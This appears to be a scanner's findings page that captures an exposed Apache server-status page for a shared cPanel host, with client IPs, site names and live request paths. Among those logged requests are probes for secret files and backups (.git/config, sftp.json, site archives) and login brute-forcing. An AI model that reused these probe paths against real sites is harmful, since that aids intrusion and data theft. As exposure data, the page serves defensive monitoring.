      1-5293180/8/3522_
      1.3488311937810.00.42861.25
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.php?doing_wp_cron=1718946972.18929600715637207031
      
      1-5293180/8/3263_
      1.3316926133840.00.06294.46
      66.249.66.82http/1.1albayan.edu.sa:443GET /e_sch/includes/skins/kollection/wdg.css HTTP/1.1
      
      1-5293180/8/3575_
      1.35806427994190.00.11338.09
      64.225.75.246http/1.1zed.sa:443GET /_all_dbs HTTP/1.1<
      Found on 2024-06-21 05:17
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831404c97e07c

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Friday, 21-Jun-2024 06:50:43 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  10 days 2 hours 47 minutes 38 seconds
      Server load: 0.05 0.07 0.05
      Total accesses: 860646 - Total Traffic: 95.7 GB - Total Duration: 1906041179
      CPU Usage: u527.08 s43.42 cu3731.42 cs771.49 - .58% CPU load
      .985 requests/sec - 114.8 kB/second - 116.6 kB/request - 2214.66 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 241 idle workers
      _______________________W___K___________________________________K
      _____________________________K_________________________K________
      ____________K____________K_____________________________________K
      _________________________________.....................W.........
      ...................__K______________________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5154470/171/3922_
      12.933655304499650.01.61378.14
      172.70.251.2http/1.1qr.brunch.ws:443GET /storage/food_image/17096787609046_sweetmelon.webp HTTP/1.1
      
      0-5154470/78/3482_
      13.02412514458640.013.76356.17
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-5154470/79/3465_
      12.8036814335651820.011.36460.54
      172.70.251.21http/1.1qr.brunch.ws:443GET /dar-zed?fbclid=PAZXh0bgNhZW0CMTEAAaYewfkIGj0mEsY9JPb1EhjKZ
      
      0-5154470/128/3683_
      12.8736647264140.09.27285.16
      172.70.251.128http/1.1qr.brunch.ws:443GET /storage/food_image/17088526154753_img417ac9265ec848f69f20f
      
      0-5154470/140/3779_
      12.95364410562340.08.92382.82
      172.70.251.33http/1.1qr.brunch.ws:443GET /storage/food_image/17162865913767_raspberrypistachioespres
      
      0-5154470/63/3483_
      12.92365320566320.066.61513.92
      172.70.251.98http/1.1qr.brunch.ws:443GET /storage/food_image/17096787262592_lemon.webp HTTP/1.1
      
      0-5154470/132/3920_
      12.8236636934170.04.73317.82
      172.70.250.20http/1.1qr.brunch.ws:443GET /storage/category_image/17098166194722_22.png HTTP/1.1
      
      0-5154470/85/3739_
      12.97207213695320.03.67309.32
      40.77.167.203http/1.13dvi.com:443GET /robots.txt HTTP/1.1
      
      0-5154470/72/3509_
      12.9436419764160.07.48228.22
      172.70.250.76http/1.1qr.brunch.ws:443GET /storage/food_image/17162863979577_flatwhite.jpg HTTP/1.1
      
      0-5154470/75/3522_
      12.9993028340030.04.05641.76
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-5154470/63/3641_
      12.99152010528330.00.89343.99
      195.191.219.133http/1.13dvi.com:80GET / HTTP/1.1
      
      0-5154470/92/3483_
      12.91365515998090.023.69425.76
      172.70.250.58http/1.1qr.brunch.ws:443GET /storage/food_image/17088533725513_imgdebdee5a0f8c4a2baf5e0
      
      0-5154470/136/3587_
      12.86366693818350.04.82240.24
      172.70.250.177http/1.1qr.brunch.ws:443GET /storage/food_image/17096783429150_lamp.webp HTTP/1.1
      
      0-5154470/119/3858_
      12.92365311677390.03.94266.59
      172.70.251.88http/1.1qr.brunch.ws:443GET /storage/food_image/17088535367542_imgd0268fa62d0c437fad637
      
      0-5154470/86/3830_
      12.96307024963240.03.35656.67
      66.249.66.82http/1.1albayan.edu.sa:80GET /web/116.html2 HTTP/1.1
      
      0-5154470/82/3737_
      12.96236110870730.030.52369.37
      199.47.82.19http/1.1albayan.edu.sa:443GET /robots.txt HTTP/1.1
      
      0-5154470/139/3683_
      12.9536445288340.023.55317.08
      172.70.250.123http/1.1qr.brunch.ws:443GET /storage/vendor_settings/17085246857302_group6395.png HTTP/
      
      0-5154470/57/3561_
      12.94365212005700.04.85374.68
      172.70.251.37http/1.1qr.brunch.ws:443GET /storage/food_image/17162861459998_latte.jpg HTTP/1.1
      
      0-5154470/69/3366_
      12.8136716364210.05.74349.12
      172.70.250.156http/1.1qr.brunch.ws:443GET /assets/libs/alertifyjs/build/alertify.min.js HTTP/1.1
      
      0-5154470/78/2983_
      12.8936627683820.010.12367.73
      172.70.251.68http/1.1qr.brunch.ws:443GET /storage/food_image/17088481891935_imgeb2b4322c0164d6c804d5
      
      0-5154470/105/3368_
      12.7951171848389380.05.26343.20
      210.245.54.117http/1.1daris.live:80GET /wp-login.php HTTP/1.1
      
      0-5154470/108/3671_
      12.99206159564440.013.79255.87
      40.77.202.86http/1.13dvi.com:443GET /api/settings/get HTTP/1.1
      
      0-5154470/130/3689_
      12.8536615504920.04.90367.25
      172.70.251.138http/1.1qr.brunch.ws:443GET /storage/food_image/17088475115053_img17bdcc1308974f8591ad5
      
      0-5154470/105/3434W
      12.790010303320.02.64470.42
      172.70.162.99http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-5154470/54/3782_
      12.87366715096570.03.19330.40
      172.70.251.57http/1.1qr.brunch.ws:443GET /storage/food_image/17088523246974_imge10c33bc297a444884398
      
      1-57910/25/3577_
      4.933661635801730.01.24451.79
      172.70.250.204http/1.1qr.brunch.ws:443GET /storage/food_image/17096782595842_risottobeef.webp HTTP/1.
      
      1-57910/23/3136_
      4.933662101179220.053.40424.38
      172.70.251.71http/1.1qr.brunch.ws:443GET /storage/food_image/17088546313133_imga42b7dec0beb4587b22a0
      
      1-57911/28/3514K
      5.2500627266980.70.81284.80
      141.101.98.115http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      1-57910/20/3422_
      4.9236628113310.01.02196.67
      172.70.250.40http/1.1qr.brunch.ws:443GET /storage/food_image/17096758612967_zaatarflatbread.webp HTT
      
      1-57910/30/3605_
      5.211421347999410.01.18261.78
      54.36.149.22http/1.1daris.live:80GET /product/7 HTTP/1.1
      
      1-57910/41/3493_
      4.9436639822400.02.43396.04
      172.70.251.72http/1.1qr.brunch.ws:443GET /storage/food_image/17088489046233_c16b6bc81cf4c9583773be26
      
      1-57910/24/3501_
      4.89366411916750.01.16859.92
      172.70.250.211
      Found on 2024-06-21 03:50
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314076d1aabc

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 18-Jun-2024 23:41:39 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  7 days 19 hours 38 minutes 34 seconds
      Server load: 0.01 0.05 0.05
      Total accesses: 657928 - Total Traffic: 75.0 GB - Total Duration: 1649092464
      CPU Usage: u376.67 s26.23 cu2864.67 cs607.09 - .574% CPU load
      .974 requests/sec - 116.5 kB/second - 119.6 kB/request - 2506.49 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 216 idle workers
      __K______________________K______________________________________
      ______K_________________________________K_____________________K_
      ____W_________________...................................W......
      ........___________K___________________________________K__......
      ............................................____________________
      ____K...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-583370/43/2884_
      5.4246766302540060.07.08308.74
      172.69.151.162http/1.1sibaqulhorof.com:443GET /auth/login HTTP/1.1
      
      0-583370/35/2479_
      5.4249628424580.06.62283.81
      66.249.66.82http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%AC%D8%AF%D9%8A%D8%AF%20%D8%AC%D8%AF%D9%8
      
      0-583371/42/2545K
      5.710133170930.82.33345.74
      172.69.195.128http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-583370/81/2682_
      5.643643768730.01.43213.37
      143.92.164.14http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/165____%20__________%2
      
      0-583370/43/2819_
      5.4154225678770.03.37344.66
      47.242.17.140http/1.1albayan.edu.sa:443GET /albayan_edu_sa.tgz HTTP/1.1
      
      0-583370/37/2464_
      5.4056423544760.06.42358.88
      152.32.199.112http/1.1php.we3dvi.com:80GET / HTTP/1.1
      
      0-583370/65/2850_
      5.5211754955610.03.84256.83
      143.92.164.14http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/tOjex3mEFyPsbTAT8gkfRn
      
      0-583370/30/2869_
      5.453092448931440.00.86246.94
      148.251.168.205http/1.1sulaimaniya.edu.sa:443GET /2024/05/27/%D8%AC%D8%AF%D9%88%D9%84-%D8%A7%D9%84%D8%A7%D8%
      
      0-583370/31/2596_
      5.56685253654200.01.29161.37
      143.92.164.14http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/Hyg6dmd6QNIVgaxZqmNFGa
      
      0-583370/24/2560_
      5.4726016614125320.05.21548.95
      148.251.168.205http/1.1sulaimaniya.edu.sa:443GET /download/47/%D8%A7%D9%84%D8%AD%D9%82%D8%A7%D8%A6%D8%A8/290
      
      0-583370/42/2796_
      5.576727233260.03.77273.05
      114.119.139.202http/1.13dvi.com:443GET /robots.txt HTTP/1.1
      
      0-583370/48/2726_
      5.55921109491550.04.66349.40
      5.61.25.34http/1.1sulaimaniya.edu.sa:443POST /xmlrpc.php HTTP/1.1
      
      0-583370/38/2520_
      5.47157291573330.04.40173.57
      66.249.66.82http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-583370/29/2665_
      5.4345135426450.01.98190.09
      47.242.17.140http/1.1albayan.edu.sa:443GET /albayan.edu.sa_backup.tar.gz HTTP/1.1
      
      0-583370/31/2873_
      5.453342379204330.01.88518.05
      148.251.168.205http/1.1sulaimaniya.edu.sa:443GET /2024/04/17/%D9%85%D8%B3%D8%A7%D8%A8%D9%82%D8%A9-%D8%A7%D9%
      
      0-583370/40/2892_
      5.5410626661190.01.77288.93
      143.92.164.14http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/YO0EQAvCa2ZH2wioRGOk6r
      
      0-583370/22/2703_
      5.6792122914990.05.27229.26
      143.92.164.14http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/QZajtfQhuMiraEu2rkP6Zx
      
      0-583370/41/2603_
      5.71266414430.03.06326.43
      143.92.164.14http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/4JFb9GjXQsmKTweGfCEBLz
      
      0-583370/72/2627_
      5.662554737610.01.33217.85
      143.92.164.14http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/si0FT0ijGt2sBSSJYrhlX0
      
      0-583370/25/2206_
      4.8943524764100.00.31301.35
      104.248.114.41http/1.1
      
      0-583370/50/2510_
      5.453360845661550.01.29301.59
      205.169.39.207http/1.1akg.sa:80GET / HTTP/1.1
      
      0-583370/73/2665_
      5.472142606769370.01.35188.79
      148.251.168.205http/1.1sulaimaniya.edu.sa:443GET /author/admin/page/3/ HTTP/1.1
      
      0-583370/38/2496_
      5.634763284850.01.61264.79
      143.92.164.14http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/lRzGAwljL5u2NMzXoOON27
      
      0-583370/23/2463_
      5.44402538968400.01.28436.58
      164.90.170.158http/1.1trydaris.com:443POST /wp-login.php HTTP/1.1
      
      0-583370/34/2683_
      5.44377909869340.01.04220.95
      8.218.212.177http/1.1trydaris.com:443POST /wp-login.php HTTP/1.1
      
      1-583671/45/2989K
      5.4601634318780.82.98406.07
      172.70.90.86http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      1-583670/30/2642_
      5.145801996580520.09.90331.29
      148.251.168.205http/1.1sulaimaniya.edu.sa:443GET /%D9%85%D9%86%D9%87%D8%AC%D9%8A%D8%AA%D9%86%D8%A7-%D8%A7%D9
      
      1-583670/39/2845_
      5.331155626550160.05.07252.48
      143.92.164.14http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/4ZxKmr7Lnx6PaOYBwrlqP3
      
      1-583670/130/2863_
      5.452566731820.02.26162.56
      143.92.164.14http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/RHqpmss9GDpjqmeHwTLX1e
      
      1-583670/31/2822_
      4.71251576286120.01.34161.06
      18.208.205.244http/1.1
      
      1-583670/29/2727_
      5.2438827051210.00.92286.67
      47.242.17.140http/1.1albayan.edu.sa:443GET /data.tgz HTTP/1.1
      
      1-583670/37/2913_
      5.4047610204910.02.22326.47
      143.92.164.14http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/RqkP7KzY3ncFdtXlV6qrOr
      
      1-583670/43/2590_
      5.139<
      Found on 2024-06-18 20:41
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831402b091fe1

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 18-Jun-2024 22:32:29 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  7 days 18 hours 29 minutes 24 seconds
      Server load: 0.08 0.07 0.10
      Total accesses: 653520 - Total Traffic: 74.6 GB - Total Duration: 1648432134
      CPU Usage: u351.99 s22.42 cu2864.67 cs607.09 - .573% CPU load
      .973 requests/sec - 116.5 kB/second - 119.7 kB/request - 2522.39 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 216 idle workers
      ___________K___________________________________K________________
      ____K_____________________________W___________________K_________
      ___________________K__...................................W......
      ........__K________________________________________K______......
      ............................................__________________K_
      _____...........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-583370/22/2863_
      2.85261302462120.03.06304.72
      47.242.17.140http/1.1albayan.edu.sa:443GET /Archive.zip HTTP/1.1
      
      0-583370/15/2459_
      2.60234488393100.00.23277.42
      66.249.66.83http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=686&l_n=1&page=1 HTTP/
      
      0-583370/30/2533_
      2.59252233146390.01.94345.35
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-583370/17/2618_
      2.5927213754140.00.30212.23
      207.65.32.20http/1.1albayan.edu.sa:443GET /ads.txt HTTP/1.1
      
      0-583370/27/2803_
      2.6620345670060.01.45342.74
      77.31.212.111http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/________%20_________18
      
      0-583370/21/2448_
      2.78147203536660.05.78358.23
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-583370/45/2830_
      2.76168234946370.03.25256.24
      77.31.196.119http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-583370/13/2852_
      2.791132978924560.00.51246.59
      66.249.66.83http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D9%85%D9%8
      
      0-583370/16/2581_
      2.8110973613270.00.31160.38
      207.102.138.19http/1.1akg.sa:443GET /_next/static/development/_buildManifest.js?ts=171873902840
      
      0-583370/11/2547_
      2.751751814117320.00.87544.62
      77.31.196.119http/1.1jawad.com.sa:443POST /api/v.1/front/category/product HTTP/1.1
      
      0-583370/18/2772_
      2.56352197216980.02.03271.32
      66.249.83.44http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-583371/34/2712K
      2.87029461930.82.39347.14
      162.158.94.155http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-583370/24/2506_
      2.8110612990987730.00.92170.10
      77.31.228.113http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/ixOgT2BtrsffGYib0DPLMk
      
      0-583370/17/2653_
      2.8429195408700.00.92189.03
      77.31.212.101http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      0-583370/17/2859_
      2.8011449187100.00.74516.90
      77.31.228.121http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/koqJcPBiHc3M36bAnmU2i3
      
      0-583370/12/2864_
      2.4735626644710.00.04287.20
      162.158.146.44http/1.1adyar.com.sa:80GET /assets/js/isotope.pkgd.js HTTP/1.1
      
      0-583370/8/2689_
      2.5730922902630.04.43228.41
      47.242.17.140http/1.1albayan.edu.sa:443GET /aa.tar.gz HTTP/1.1
      
      0-583370/21/2583_
      2.612086676395390.01.06324.43
      51.195.176.80http/1.1zed.sa:443POST /wp-login.php HTTP/1.1
      
      0-583370/9/2564_
      2.5827504715240.00.19216.72
      66.249.66.37http/1.1alezdhar.com:80GET /robots.txt HTTP/1.1
      
      0-583370/13/2194_
      2.4735524756130.00.03301.07
      162.158.146.128http/1.1adyar.com.sa:80GET /assets/images/started-n26-1920x1080.jpg HTTP/1.1
      
      0-583370/37/2497_
      2.741746845657850.00.76301.06
      198.50.227.81http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/tOjex3mEFyPsbTAT8gkfRn
      
      0-583370/62/2654_
      2.86226741330.00.36187.80
      77.31.212.113http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/DnNHX3xM3eYOrFJQ0lOdOh
      
      0-583370/12/2470_
      2.5734753269580.00.10263.29
      188.249.33.187http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/wkF0NxOfDQYLn1pNQm2Myh
      
      0-583370/10/2450_
      2.8248168944250.00.20435.50
      162.158.129.39http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-583370/17/2666_
      2.5635629854930.00.53220.44
      188.249.33.187http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/wkF0NxOfDQYLn1pNQm2Myh
      
      1-583670/18/2962_
      2.292663634297560.00.52403.60
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.php?doing_wp_cron=1718738882.41004204750061035156
      
      1-583670/19/2631_
      2.4615986561870.08.75330.13
      77.31.196.119http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/U132RHf6WqKoxFZzDuMFzn
      
      1-583670/11/2817_
      2.08210688626531130.03.31250.72
      179.6.147.66http/1.1
      
      1-583670/60/2793_
      2.292958626714490.00.54160.84
      40.77.167.32http/1.1zed.sa:443GET /product/orange-juice?add-to-cart=3258 HTTP/1.1
      
      1-583670/19/2810_
      2.3917466278400.00.46160.18
      198.50.227.81http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/4ZxKmr7Lnx6PaOYBwrlqP3
      
      1-583670/14/2712_
      2.491061297040130.00.29286.05
      77.31.228.113http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/IvxJerHUgW8X6CTsbkqqE5
      
      1-583670/21/2897_
      2.3520315910186030.00.96325.21
      77.31.212.111http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/________%20_________18
      Found on 2024-06-18 19:32
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831403906dc6b

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 17-Jun-2024 01:51:56 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  5 days 21 hours 48 minutes 51 seconds
      Server load: 0.04 0.08 0.05
      Total accesses: 505776 - Total Traffic: 62.0 GB - Total Duration: 1556506097
      CPU Usage: u291.55 s21.94 cu2177.97 cs455.79 - .577% CPU load
      .991 requests/sec - 127.4 kB/second - 128.6 kB/request - 3077.46 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 216 idle workers
      _________________K_________________________K_______K____________
      ____W______________K_______________________________________W____
      ________________________________K______________________________K
      ________........................................................
      ................................................................
      .....________________________K..................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4150130/82/2160_
      7.14824299158450.09.61242.49
      51.252.140.162http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/BDrIjQo9dii8CC8pflYF2L
      
      0-4150130/36/1787_
      6.826012146198720.02.32176.63
      77.74.177.119http/1.1akg.sa:443GET / HTTP/1.1
      
      0-4150130/23/1701_
      7.11101157154360.016.07175.48
      40.77.167.49http/1.1jawad.com.sa:443GET /ar HTTP/1.1
      
      0-4150130/109/1920_
      7.09179203154170.09.27166.67
      194.233.65.81http/1.1jilani.com.sa:80GET /.git/config HTTP/1.1
      
      0-4150130/188/2156_
      7.0914114992640.01.47309.06
      66.249.66.81http/1.1albayan.edu.sa:443GET /imgweb/cur41/7th/math2.pdf HTTP/1.1
      
      0-4150130/78/1749_
      7.0525570112718930.00.73194.92
      34.31.140.44http/1.1sulaimaniya.edu.sa:443GET /wp-content/plugins/PDFEmbedder-premium/js/pdfjs/pdf-4.4.1.
      
      0-4150130/55/2013_
      6.844931053625250.02.92137.85
      5.255.231.75http/1.1albayan.edu.sa:443GET /imgweb/file42/zoom1.pdf HTTP/1.1
      
      0-4150130/171/2192_
      6.85393363381930.00.48193.53
      40.77.167.14http/1.1jawad.com.sa:443GET /ar/details/557 HTTP/1.1
      
      0-4150130/22/1696_
      6.8444222852900.09.24119.77
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1718577873.56340098381042480468
      
      0-4150130/102/1861_
      6.86377213080040.05.21437.00
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1718577938.85140991210937500000
      
      0-4150130/72/1990_
      6.97306554820400.05.72244.37
      114.119.139.123http/1.13dvi.com:443GET /images/folio/thumbs/192575118038803.jpg HTTP/1.1
      
      0-4150130/26/1818_
      6.758133880720.03.33265.52
      51.252.140.162http/1.1
      
      0-4150130/22/1818_
      7.1671188260670.029.11122.36
      54.36.148.0http/1.1daris.live:443GET /robots.txt HTTP/1.1
      
      0-4150130/81/1817_
      7.185443991390.01.25149.25
      77.31.234.174http/1.1jawad.com.sa:443GET /public/front_resources/js/jquery.star-rating-svg.min.js HT
      
      0-4150130/35/2110_
      7.05258110008360570.09.71459.37
      34.31.140.44http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/1E3A0622-1-scaled.jpg HTTP/1.1
      
      0-4150130/58/2020_
      6.7028733310200.019.11209.16
      51.83.67.14http/1.1
      
      0-4150130/76/1876_
      7.06249582346920.01.21178.91
      172.68.19.165http/1.13dvi.com:443GET / HTTP/1.1
      
      0-4150131/77/1895K
      7.19015673320.821.80275.04
      172.71.250.41http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-4150130/21/1945_
      6.84581124057670.07.04173.89
      216.244.66.198http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=986 HTTP/1.1
      
      0-4150130/28/1529_
      7.0823433727150.00.48251.41
      34.31.140.44http/1.1sulaimaniya.edu.sa:443GET /wp-content/themes/kids-world/demo/images/school-sketch-ele
      
      0-4150130/62/1848_
      6.913532843316920.010.77240.89
      40.77.167.50http/1.1sulaimaniya.edu.sa:443GET /wp-includes/js/wp-emoji-release.min.js?ver=6.5.4 HTTP/1.1
      
      0-4150130/39/1926_
      6.9633925713270.09.14137.70
      52.167.144.224http/1.1sulaimaniya.edu.sa:443GET /wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.13.2 HT
      
      0-4150130/27/1836_
      6.7418632651610.07.21178.83
      34.31.140.44http/1.1
      
